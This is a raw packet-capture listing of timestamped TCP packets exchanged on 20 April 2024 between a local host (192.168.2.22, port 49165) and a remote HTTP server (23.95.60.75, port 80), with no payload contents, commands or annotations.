Apr 20, 2024 11:36:12.743974924 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.744014978 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.744021893 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.744054079 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.744091034 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.744093895 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.744159937 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.744199038 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.744218111 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.744237900 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.744275093 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.744291067 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.744313002 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.744354010 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.744365931 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.744393110 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.744431019 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.744441032 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.744467974 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.744507074 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.744514942 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.897551060 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.897619963 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.897622108 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.897681952 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.897722006 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.897738934 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.897777081 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.897828102 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.897840023 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.897888899 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.897932053 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.897943020 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.897985935 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898041964 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.898066998 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898124933 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898174047 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898185015 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.898220062 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898274899 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898313046 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898322105 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.898367882 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898400068 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.898427010 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898482084 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898493052 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.898524046 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898576975 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898585081 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.898633003 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898672104 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898689985 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.898726940 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898782015 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898792028 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.898823977 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898873091 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898885965 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.898924112 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898967028 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.898977041 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.899022102 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899060965 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899112940 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899148941 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.899168015 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899189949 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.899210930 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899247885 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899276018 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.899286032 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899326086 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899344921 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.899379015 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899420023 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899440050 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.899471045 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899514914 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899538994 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.899564981 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899616003 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899624109 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.899660110 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899708986 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.899713039 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899769068 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899823904 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899832010 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.899876118 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899928093 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.899944067 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.899982929 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.900037050 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.900041103 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.900090933 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.900161028 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.900168896 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.900228024 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.900279999 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.900283098 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.900333881 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.900388956 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.900389910 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.900446892 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.900489092 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.900500059 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.900691986 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.900743961 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.900768995 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.900780916 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.900819063 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.900837898 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.900856972 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.900892973 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.900902987 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.900930882 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.900966883 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.900980949 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.901005030 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901042938 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901057959 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.901082039 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901119947 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901129961 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.901159048 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901196003 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901209116 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.901232958 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901269913 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901283979 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.901309013 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901346922 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901364088 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.901397943 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901434898 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901465893 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.901470900 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901510000 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901532888 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.901546955 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901583910 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901602983 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.901622057 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901659012 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901668072 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.901695967 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901731968 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901741982 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.901770115 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901806116 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901815891 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.901845932 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901881933 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901895046 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.901920080 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901956081 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.901967049 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.901993036 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902030945 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902040958 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.902069092 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902106047 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902117968 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.902143955 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902180910 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902194977 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.902282953 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902319908 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902334929 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.902358055 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902394056 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902404070 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.902431965 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902468920 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902489901 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.902507067 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902554035 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.902559042 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902599096 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902646065 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902652979 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.902683020 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902694941 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.902719975 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902731895 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.902757883 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902769089 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.902796984 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902808905 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.902836084 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902853966 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.902873993 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902887106 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.902913094 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902923107 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.902951002 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.902964115 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.902988911 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.903013945 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.903027058 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.903037071 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.903065920 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.903079987 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.903103113 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.903117895 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.903141975 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.903156996 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.903181076 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.903194904 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.903218985 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.903234959 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.903256893 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.903274059 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.903295040 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.903311968 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.903335094 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.903357983 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.903373003 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.903384924 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.903408051 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.903419018 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.903446913 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.903465986 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.903484106 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.903501034 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.903523922 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.903542042 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.903593063 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.056896925 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.056963921 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057003021 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057048082 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057068110 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057087898 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057115078 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057115078 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057115078 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057126999 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057156086 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057166100 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057173967 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057204008 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057220936 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057245970 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057265997 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057287931 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057308912 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057327032 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057346106 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057363987 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057382107 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057404041 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057435989 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057441950 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057468891 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057486057 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057524920 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057543993 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057562113 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057566881 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057588100 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057602882 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057620049 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057642937 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057656050 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057683945 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057703018 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057723999 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057739019 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057763100 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057779074 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057802916 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057817936 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057842016 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057861090 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057881117 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057898998 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057920933 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057934999 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057960033 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.057976961 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.057998896 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058010101 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058038950 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058060884 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058079004 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058089972 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058118105 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058131933 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058156013 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058171988 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058196068 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058217049 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058233976 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058254004 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058270931 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058291912 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058310032 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058321953 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058350086 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058362961 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058391094 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058408976 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058432102 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058453083 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058470964 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058489084 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058509111 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058526039 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058547020 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058558941 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058588028 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058604956 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058626890 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058641911 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058670998 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058690071 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058710098 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058727026 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058748960 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058763981 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058788061 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058804035 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058826923 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058836937 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058867931 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058885098 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058911085 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058929920 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.058948994 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.058964968 CEST	49165	80	192.168.2.22	23.95.60.75
